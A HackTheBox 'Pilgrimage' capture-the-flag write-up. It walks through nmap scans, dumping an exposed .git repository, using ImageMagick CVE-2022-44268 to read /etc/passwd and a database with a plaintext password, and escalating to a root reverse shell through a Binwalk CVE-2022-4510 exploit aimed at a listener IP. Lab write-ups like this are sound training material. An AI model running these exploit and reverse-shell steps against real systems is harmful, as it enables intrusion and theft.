#hackthebox #easy #linux #git #git-dumper ![[Pasted image 20250802014010.png]] # Information Gathering - Nmap First, as usual, I performed a TCP scan against all ports and discovered 2 open ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:33 UTC Nmap scan report for 10.10.11.219 Host is up (0.052s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds ``` Then another TCP scan against the 2 open ports, 22 and 80, to gather more information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:34 UTC Nmap scan report for 10.10.11.219 Host is up (0.045s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA) | 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA) |_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519) 80/tcp open http nginx 1.18.0 |_http-title: Did not follow redirect to http://pilgrimage.htb/ |_http-server-header: nginx/1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds ``` Lastly a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:36 UTC Nmap scan report for 10.10.11.219 Host is up (0.046s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp open|filtered ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp open|filtered ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds ``` --- # Enumeration ##### HTTP - TCP 80 The landing page was originally empty, so I have added `pilgrimage.htb` to `/etc/hosts` file. This is what the landing page looks like. It's a website for image shrinker. ![[Pasted image 20250801204903.png]] On `login` page, I tried some default credentials but they did not work. Therefore, I made an account under my name. I wanted to try the shrink feature and see what happens. So I uploaded a random image and pressed the `shrink` button. ![[Pasted image 20250801205334.png]] Then on `Dashboard` page, there was the urls for the shrunken images I uploaded. I tried 2 times. However, notice that the name of the images files I uploaded have been changed to some random strings. ![[Pasted image 20250801205756.png]] Not only that but also Burp shows that even if I changed the file name to `.php`, the backend server changes the file extension back to `.png` which indicates acquiring webshell is going to be very difficult. ![[Pasted image 20250801222401.png]] After I have added `pilgrimage.htb` in `/etc/hosts` file, I ran `nmap` again and this time it revealed `.git` directory is present in the server. ```bash 80/tcp open http nginx 1.18.0 |_http-title: Pilgrimage - Shrink Your Images |_http-server-header: nginx/1.18.0 | http-git: | 10.10.11.219:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ... ``` I used `git-dumper` to dump the `.git` directory ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ git-dumper http://pilgrimage.htb/.git/ git_loot/ [-] Testing http://pilgrimage.htb/.git/HEAD [200] [-] Testing http://pilgrimage.htb/.git/ [403] [-] Fetching common files ... <SNIP> ``` and it contained the following. What stood out to me was `magick` binary file. I think that's responsible for converting filenames and their extensions. ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ ls assets dashboard.php index.php login.php logout.php magick register.php vendor ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ file * assets: directory dashboard.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators index.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators login.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators logout.php: PHP script, ASCII text, with CRLF line terminators magick: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped register.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators vendor: directory ``` `git log` didn't reveal much but one commit. We at least found a username: `emily` ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ git log commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master) Author: emily <[email protected]> Date: Wed Jun 7 20:11:48 2023 +1000 Pilgrimage image shrinking service initial commit. ``` `./magick --version` revealed the version of the binary. Let's look it up if it has any known vulnerabilities ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ ./magick --version Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.5) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib Compiler: gcc (7.5) ``` There actually exists a known vulnerability to this version, that is `Arbitrary File Read` CVE-2022-44268 ![[Pasted image 20250801224041.png]] The PoC of the exploit can be found [here](https://git.rotfl.io/v/CVE-2022-44268) . The author wrote a very detailed step-by-step how to use. First, I cloned the github repo ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ git clone https://git.rotfl.io/v/CVE-2022-44268.git Cloning into 'CVE-2022-44268'... remote: Enumerating objects: 30, done. remote: Counting objects: 100% (30/30), done. remote: Compressing objects: 100% (19/19), done. remote: Total 30 (delta 8), reused 30 (delta 8), pack-reused 0 Receiving objects: 100% (30/30), 954.74 KiB | 1.22 MiB/s, done. Resolving deltas: 100% (8/8), done. ``` Run `cargo run "/etc/passwd"` command ```bash ┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268] └─$ ls Cargo.lock Cargo.toml image.png README.md screens src ┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268] └─$ cargo run "/etc/passwd" Updating crates.io index Downloaded bitflags v1.3.2 Downloaded cfg-if v1.0.0 Downloaded adler v1.0.2 Downloaded hex v0.4.3 Downloaded crc32fast v1.3.2 Downloaded png v0.17.7 Downloaded flate2 v1.0.25 Downloaded miniz_oxide v0.6.2 Downloaded 8 crates (301.4 KB) in 0.23s Compiling crc32fast v1.3.2 Compiling cfg-if v1.0.0 Compiling adler v1.0.2 Compiling bitflags v1.3.2 Compiling hex v0.4.3 Compiling miniz_oxide v0.6.2 Compiling flate2 v1.0.25 Compiling png v0.17.7 Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/CVE-2022-44268) Finished `dev` profile [unoptimized + debuginfo] target(s) in 4.84s Running `target/debug/cve-2022-44268 /etc/passwd` ``` `magick image.png -resize 50% output.png` and `identify -verbose output.png` ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ ./magick image.png -resize 50% output.png magick: keyword "Raw profile type ": bad character '0x20' `output.png' @ warning/png.c/MagickPNGWarningHandler/1750. ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ ls assets dashboard.php image.png index.php login.php logout.php magick output.png register.php vendor ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ identify -verbose output.png Image: Filename: output.png Permissions: rw-rw-r-- Format: PNG (Portable Network Graphics) Mime type: image/png ... <SNIP> ``` Scroll down to the bottom, you will find the `hex` ![[Pasted image 20250801225236.png]] and if we convert the hex back to binary we get the actual `/etc/passwd` contents. This file read is being done under `www-data` user, so we will not be able to read emily's `.ssh`. ```bash root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:109::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin emily:x:1000:1000:emily,,,:/home/emily:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin _laurel:x:998:998::/var/log/laurel:/bin/false ``` Then I went back to the git repo we dumped earlier and found the path of `sqlite`. I'm going to repeat the steps one more time to read `/var/db/pilgrimage` and see what it includes inside the file. ![[Pasted image 20250801232633.png]] ```bash ┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268] └─$ cargo run "/var/db/pilgrimage" Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s Running `target/debug/cve-2022-44268 /var/db/pilgrimage` ┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268] └─$ exiftool image.png ExifTool Version Number : 13.25 File Name : image.png Directory : . File Size : 1660 bytes File Modification Date/Time : 2025:08:02 04:27:37+00:00 File Access Date/Time : 2025:08:02 04:24:34+00:00 File Inode Change Date/Time : 2025:08:02 04:27:37+00:00 File Permissions : -rw-rw-r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 200 Image Height : 200 Bit Depth : 8 Color Type : RGB with Alpha Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Profile : /var/db/pilgrimage Image Size : 200x200 Megapixels : 0.040 ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ head sqlite.hex 53514c69746520666f726d617420330010000101004020200000004c0000000500000000 000000000000000400000004000000000000000000000001000000000000000000000000 00000000000000000000000000000000000000000000004c002e4b910d0ff800040eba00 0f650fcd0eba0f3800000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 ┌──(kali㉿kali)-[~/Desktop] └─$ cat sqlite.hex | xxd -r -p > sqlite.db ``` After repeating the steps for `/var/db/pilgrimage`, I found emily's credentials inside. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sqlite3 sqlite.db SQLite version 3.46.1 2024-08-13 09:16:08 Enter ".help" for usage hints. sqlite> .dump PRAGMA foreign_keys=OFF; BEGIN TRANSACTION; CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL); INSERT INTO users VALUES('emily','abigchonkyboi123'); CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL); COMMIT; sqlite> ``` # Initial Access - shell as `emily` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh emily@$IP [email protected]'s password: Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. emily@pilgrimage:~$ whoami emily ``` Found `user.txt` ```bash emily@pilgrimage:~$ cat user.txt fe1... ``` # Privilege Escalation `ps faux | grep root` revealed this unusual process. Let's look at what this file does ![[Pasted image 20250802010423.png]] `inotifywait` is monitoring over the path `/var/www/pilgrimage.htb/shrunk` for any file creation event. When a file is uploaded, `binwalk` analyzes the contents of the file. ```bash emily@pilgrimage:/home$ cat /usr/sbin/malwarescan.sh #!/bin/bash blacklist=("Executable script" "Microsoft executable") /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')" binout="$(/usr/local/bin/binwalk -e "$filename")" for banned in "${blacklist[@]}"; do if [[ "$binout" == *"$banned"* ]]; then /usr/bin/rm "$filename" break fi done done ``` The version of `binwalk` is 2.3.2 ```bash emily@pilgrimage:/home$ binwalk 06:12:49 [26/26] Binwalk v2.3.2 Craig Heffner, ReFirmLabs https://github.com/ReFirmLabs/binwalk Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ... Signature Scan Options: -B, --signature Scan target file(s) for common file signatures -R, --raw=<str> Scan target file(s) for the specified sequence of bytes -A, --opcodes Scan target file(s) for common executable opcode signatures -m, --magic=<file> Specify a custom magic file to use -b, --dumb Disable smart signature keywords -I, --invalid Show results marked as invalid -x, --exclude=<str> Exclude results that match <str> -y, --include=<str> Only show results that match <str> ``` Apparently, there was a known vulnerability to this version of Binwalk. ![[Pasted image 20250802011340.png]] The PoC explains it needs 3 arguments: `.png file`, `IP to listener`, and `listener port` ![[Pasted image 20250802011642.png]] I transferred the poc to the path of `/dev/shm` on the target host. I created an empty `.png` file. When it was successfully run, I was told to rename it to `binwalk_exploit` ```bash emily@pilgrimage:/dev/shm$ python3 51249.py exploit.png 10.10.14.14 1234 ################################################ ------------------CVE-2022-4510---------------- ################################################ --------Binwalk Remote Command Execution-------- ------Binwalk 2.1.2b through 2.3.2 included----- ------------------------------------------------ ################################################ ----------Exploit by: Etienne Lacoche----------- ---------Contact Twitter: @electr0sm0g---------- ------------------Discovered by:---------------- ---------Q. Kaiser, ONEKEY Research Lab--------- ---------Exploit tested on debian 11------------ ################################################ You can now rename and share binwalk_exploit and start your local netcat listener. ``` We saw that `inotifywait` in `malwarescan.sh` is monitoring the specific path `/var/www/pilgrimage.htb/shrunk` for any file upload activity, we have to move our file to the same path to trigger our exploit. I copied `binwalk_exploit.png` to `/var/www/pilgrimage.htb/shrunk` and I got the reverse shell as `root`! ![[Pasted image 20250802012649.png]] Found `root.txt` ```bash cat root.txt 621... ```